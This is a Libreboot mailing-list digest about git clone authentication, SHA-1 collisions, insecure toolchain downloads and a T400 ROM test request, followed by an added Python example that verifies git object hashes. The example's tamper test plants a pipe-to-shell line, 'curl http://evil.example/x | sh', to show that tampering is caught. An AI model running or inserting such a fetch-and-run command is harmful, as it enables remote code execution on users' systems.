I have a t500. I'm willing to test. On Aug 22, 2016 12:00 PM, <[email protected]> wrote:
> Send Libreboot mailing list submissions to
> 	[email protected]
>
> To subscribe or unsubscribe via the World Wide Web, visit
> 	https://lists.gnu.org/mailman/listinfo/libreboot
> or, via email, send a message with subject or body 'help' to
> 	[email protected]
>
> You can reach the person managing the list at
> 	[email protected]
>
> When replying, please edit your Subject line so it is more specific
> than "Re: Contents of Libreboot digest..."
>
>
> Today's Topics:
>
>    1. Re: Git clone authentication (koanhead)
>    2. tester needed for t400 (Arthur Heymans)
>    3. Re: Git clone authentication (Duncan Guthrie)
>    4. Re: GNU Libreboot, version 20160818 released (Robert Alessi)
>
>
> ----------------------------------------------------------------------
>
> Message: 1
> Date: Sun, 21 Aug 2016 16:53:04 -0700
> From: koanhead <[email protected]>
> To: [email protected]
> Subject: Re: [Libreboot] Git clone authentication
> Message-ID: <[email protected]>
> Content-Type: text/plain; charset=utf-8
>
> On 08/20/2016 02:11 AM, Leah Rowe wrote:
> > Hi,
> >
> > On 20/08/16 at 01:41, koanhead wrote:
> ...
> >
> >> Other than that, if you clone the repository in a manner vulnerable
> >> to MITM, you should still be able to verify its checksum against
> >> the one that's published. As far as I can tell from perusing
> >> http://git.savannah.gnu.org/cgit/libreboot.git/, there's no global
> >> sum published for the whole tree. This might not matter, since
> >> after all we're using git, which uses hashes to identify the
> >> objects it tracks. The cgit link above shows some of these hashes.
> >> I'm not sure just now how exactly to convince git to emit enough of
> >> the correct information that you can compare the results with those
> >> shown on the savannah site, so I'm going to send this off as-is and
> >> look into it; if I figure it out I'll post in reply to this.
> >> Hopefully someone else out there already knows how to do this
> >> thing?
> >
> >
> > sha1 was broken afaik, I don't remember the link but I was reading
> > about it. Whether it's practical in practice to MITM accesses to the
> > git repository I don't know.
>
> As to whether that's practical, I don't know either, but Leah is
> definitely right about sha1 having been 'broken' in the sense that it's
> possible to generate sha1 hash collisions in somewhat reasonable time.
>
> According to
> https://en.wikipedia.org/wiki/SHA-1#Cryptanalysis_and_validation it was
> do-able but very expensive in 2005; I expect it's a lot cheaper now.
>
> I had thought that it might be practical to verify the path from the
> root of the git tree to the HEAD of whichever branch you're pulling by
> validating each hash in order; but that's only a linear increase in
> complexity (unless you have lots of branches having lots of branches) so
> it doesn't seem like it would be worthwhile to try. If anyone still
> wants to try it they can grep the list of commits from `git log`.
>
> Fortunately it doesn't matter, because https!
>
>
>
>
> ------------------------------
>
> Message: 2
> Date: Mon, 22 Aug 2016 02:04:06 +0200
> From: Arthur Heymans <[email protected]>
> To: libreboot <[email protected]>
> Subject: [Libreboot] tester needed for t400
> Message-ID: <[email protected]>
> Content-Type: text/plain; charset="us-ascii"
>
> Hi
>
> Currently libreboot reverses a patch in coreboot that is supposed to
> handle lenovo systems with two GPUs attached. This revert had to be done
> because this hybrid lenovo gpu driver does not work on t400 and results
> in the display not working in either grub or linux.
>
> A proper fix is needed and I think I know how, but I don't have a t400
> to test. So it would be nice if someone could test a rom for me on
> his/her t400 with dual graphics to confirm it's working.
>
> link to rom:
> https://home.aheymans.xyz/shared/coreboot_t400.rom
>
> How to test:
> 1) flash that rom
> 2) boot into GNU/linux
> 3) report if you have working display in GNU/linux
>
> notes:
> - it's possible this patch does not work and then you won't have
>   a working display in linux, so be prepared to either work blindly or
>   use ssh to reflash a working rom
> - it's unknown if you will have working grub on high res screens
>
> Technical details: the hybrid driver uses the wrong GPIO (gpio52 instead
> of gpio22) on t400 to connect GPUs to the display.
>
> PATCH:
> -------------- next part --------------
> A non-text attachment was scrubbed...
> Name: diff
> Type: application/octet-stream
> Size: 354 bytes
> Desc: not available
> URL: <http://lists.gnu.org/archive/html/libreboot/attachments/20160822/644d538e/attachment.obj>
> -------------- next part --------------
>
>
>
> --
> Arthur Heymans
> -------------- next part --------------
> A non-text attachment was scrubbed...
> Name: signature.asc
> Type: application/pgp-signature
> Size: 800 bytes
> Desc: not available
> URL: <http://lists.gnu.org/archive/html/libreboot/attachments/20160822/644d538e/attachment.pgp>
>
> ------------------------------
>
> Message: 3
> Date: Mon, 22 Aug 2016 01:15:56 +0100
> From: Duncan Guthrie <[email protected]>
> To: [email protected]
> Subject: Re: [Libreboot] Git clone authentication
> Message-ID: <[email protected]>
> Content-Type: text/plain; charset=UTF-8
>
> I did some more investigation into these issues.
>
> More worrying is the build process of crossgcc. It downloads source
> tarballs for its dependencies over regular http, and doesn't even verify
> the checksums, let alone cryptographic signatures. I asked about this on
> #coreboot IRC, and luckily, there is a patch on Coreboot's code review
> website, and this will probably end up being put in upstream:
> http://review.coreboot.org/#/c/15170/. This is, of course, incredibly bad
> form, but it is good that Coreboot developers are willing to fix the
> problem.
>
> With the cached packages being included in Libreboot source distribution,
> can someone confirm to me whether these had signatures verified, or at
> least checksums (manually, I presume)? Because otherwise, if some malicious
> group wanted to target a whole group of users (read: juicy targets) with an
> interest in preservation of privacy, one could target the Libreboot project
> developers. I doubt it would be especially difficult. I really hope you
> verified them...
>
> Either way, fixing the build process, obviously starting with applying the
> patch to Coreboot, is absolutely essential. I can't really believe nobody
> here ever inquired into security of the buildgcc script.
>
> Thanks for all your responses,
> D.
>
> On 22 August 2016 00:53:04 BST, koanhead <[email protected]> wrote:
> >On 08/20/2016 02:11 AM, Leah Rowe wrote:
> >> Hi,
> >>
> >> On 20/08/16 at 01:41, koanhead wrote:
> >...
> >>
> >>> Other than that, if you clone the repository in a manner vulnerable
> >>> to MITM, you should still be able to verify its checksum against
> >>> the one that's published. As far as I can tell from perusing
> >>> http://git.savannah.gnu.org/cgit/libreboot.git/, there's no global
> >>> sum published for the whole tree. This might not matter, since
> >>> after all we're using git, which uses hashes to identify the
> >>> objects it tracks. The cgit link above shows some of these hashes.
> >>> I'm not sure just now how exactly to convince git to emit enough of
> >>> the correct information that you can compare the results with those
> >>> shown on the savannah site, so I'm going to send this off as-is and
> >>> look into it; if I figure it out I'll post in reply to this.
> >>> Hopefully someone else out there already knows how to do this
> >>> thing?
> >>
> >>
> >> sha1 was broken afaik, I don't remember the link but I was reading
> >> about it. Whether it's practical in practice to MITM accesses to the
> >> git repository I don't know.
> >
> >As to whether that's practical, I don't know either, but Leah is
> >definitely right about sha1 having been 'broken' in the sense that it's
> >possible to generate sha1 hash collisions in somewhat reasonable time.
> >
> >According to
> >https://en.wikipedia.org/wiki/SHA-1#Cryptanalysis_and_validation it was
> >do-able but very expensive in 2005; I expect it's a lot cheaper now.
> >
> >I had thought that it might be practical to verify the path from the
> >root of the git tree to the HEAD of whichever branch you're pulling by
> >validating each hash in order; but that's only a linear increase in
> >complexity (unless you have lots of branches having lots of branches)
> >so it doesn't seem like it would be worthwhile to try. If anyone still
> >wants to try it they can grep the list of commits from `git log`.
> >
> >Fortunately it doesn't matter, because https!
>
>
> ------------------------------
>
> Message: 4
> Date: Mon, 22 Aug 2016 12:49:29 +0200
> From: Robert Alessi <[email protected]>
> To: Leah Rowe <[email protected]>
> Cc: [email protected]
> Subject: Re: [Libreboot] GNU Libreboot, version 20160818 released
> Message-ID: <[email protected]>
> Content-Type: text/plain; charset="us-ascii"
>
> Good point. This way everyone may use it.
>
> On Sat, Aug 20, 2016 at 10:08:54AM +0100, The Gluglug wrote:
> > -----BEGIN PGP SIGNED MESSAGE-----
> > Hash: SHA1
> >
> > On the other hand, a statically compiled 32-bit binary should also
> > work on 64-bit distros, so I could do that.
> >
> -------------- next part --------------
> A non-text attachment was scrubbed...
> Name: signature.asc
> Type: application/pgp-signature
> Size: 801 bytes
> Desc: not available
> URL: <http://lists.gnu.org/archive/html/libreboot/attachments/20160822/5a1f6443/attachment.pgp>
>
> ------------------------------
>
> Subject: Digest Footer
>
> _______________________________________________
> Libreboot mailing list
> [email protected]
> https://lists.gnu.org/mailman/listinfo/libreboot
>
>
> ------------------------------
>
> End of Libreboot Digest, Vol 23, Issue 23
> *****************************************
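The "validate each hash in order" idea raised in the Git clone authentication thread above is, in effect, what git's object model already gives you: every object id is the SHA-1 of "<type> <size>\0<payload>", a tree names its blobs and subtrees by id, and a commit names its tree and parents by id, so checking that the HEAD id you cloned equals the one published on the cgit page covers every object beneath it (modulo the SHA-1 collision caveat discussed in the thread). The following is an added example, written for this page and not code from the Libreboot or coreboot projects or from anyone on the thread. It recomputes git object ids from scratch and walks a constructed two-commit history from HEAD to the root, failing on the first object whose contents do not hash to its id. The sample repository contents, author identity and file names are made up here.

```python
"""Recompute git object ids and verify a commit chain from HEAD to root.

Added example, not Libreboot/coreboot code. The sample history below is
constructed in memory; a real check would read .git/objects instead.
"""
import hashlib


def git_object_id(obj_type: str, payload: bytes) -> str:
    """SHA-1 over the git header "<type> <size>\\0" followed by the payload."""
    header = f"{obj_type} {len(payload)}\0".encode()
    return hashlib.sha1(header + payload).hexdigest()


def blob_id(content: bytes) -> str:
    return git_object_id("blob", content)


def tree_payload(entries) -> bytes:
    """Serialize [(mode, name, hex_id), ...] the way git does.

    Entries are sorted by name, with directories (mode 40000) compared as
    if their name ended in '/', and each id is stored as 20 raw bytes.
    """
    def sort_key(e):
        mode, name, _ = e
        return name + ("/" if mode == "40000" else "")
    out = b""
    for mode, name, hex_id in sorted(entries, key=sort_key):
        out += f"{mode} {name}\0".encode() + bytes.fromhex(hex_id)
    return out


def tree_id(entries) -> str:
    return git_object_id("tree", tree_payload(entries))


def commit_payload(tree: str, parents, author: str, committer: str, message: str) -> bytes:
    lines = [f"tree {tree}"] + [f"parent {p}" for p in parents]
    lines += [f"author {author}", f"committer {committer}", "", message]
    return "\n".join(lines).encode()


def verify_chain(store, head_id: str):
    """Walk from head_id to the root, recomputing every object id on the way.

    store maps hex id -> (type, payload), standing in for .git/objects.
    Returns the verified commit ids, newest first, or raises ValueError on
    the first missing object or object whose contents do not hash to its id,
    which is what a tampered or truncated clone looks like.
    """
    def fetch(oid, expected_type):
        if oid not in store:
            raise ValueError(f"missing object {oid}")
        obj_type, payload = store[oid]
        if obj_type != expected_type:
            raise ValueError(f"{oid} is a {obj_type}, expected {expected_type}")
        if git_object_id(obj_type, payload) != oid:
            raise ValueError(f"{obj_type} {oid} does not hash to its id")
        return payload

    def check_tree(tree_oid):
        payload = fetch(tree_oid, "tree")
        pos = 0
        while pos < len(payload):
            nul = payload.index(b"\0", pos)
            mode = payload[pos:nul].split(b" ", 1)[0]
            child = payload[nul + 1:nul + 21].hex()  # 20 raw SHA-1 bytes
            pos = nul + 21
            if mode == b"40000":
                check_tree(child)
            else:
                fetch(child, "blob")

    verified, seen, todo = [], set(), [head_id]
    while todo:
        oid = todo.pop()
        if oid in seen:
            continue
        seen.add(oid)
        header = fetch(oid, "commit").partition(b"\n\n")[0].decode()
        tree = None
        for line in header.split("\n"):
            key, _, value = line.partition(" ")
            if key == "tree":
                tree = value
            elif key == "parent":
                todo.append(value)
        if tree is None:
            raise ValueError(f"commit {oid} names no tree")
        check_tree(tree)
        verified.append(oid)
    return verified


def build_sample_store():
    """Constructed two-commit history (not real Libreboot data)."""
    store = {}

    def put(obj_type, payload):
        oid = git_object_id(obj_type, payload)
        store[oid] = (obj_type, payload)
        return oid

    ident = "Example Dev <dev@example.org> 1471824000 +0000"  # made-up identity
    readme_v1 = put("blob", b"libreboot example\n")
    tree1 = put("tree", tree_payload([("100644", "README", readme_v1)]))
    c1 = put("commit", commit_payload(tree1, [], ident, ident, "initial commit\n"))
    readme_v2 = put("blob", b"libreboot example, updated\n")
    tree2 = put("tree", tree_payload([("100644", "README", readme_v2)]))
    c2 = put("commit", commit_payload(tree2, [c1], ident, ident, "update README\n"))
    return store, c2


def tamper_detected(store, head_id: str) -> bool:
    """Replace one blob's bytes while keeping its id; verification must fail."""
    tampered = dict(store)
    blob_oid = next(oid for oid, (t, _) in store.items() if t == "blob")
    tampered[blob_oid] = ("blob", b"#!/bin/sh\ncurl http://evil.example/x | sh\n")
    try:
        verify_chain(tampered, head_id)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    objects, head = build_sample_store()
    print("verified commits:", verify_chain(objects, head))
    print("tamper detected:", tamper_detected(objects, head))
```

In practice you would take `git rev-parse HEAD` from your clone, compare it by eye with the commit id shown on the cgit page (fetched over HTTPS), and run `git fsck --full` to do the recomputation above over the real object store; the example only makes visible what that recomputation consists of.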
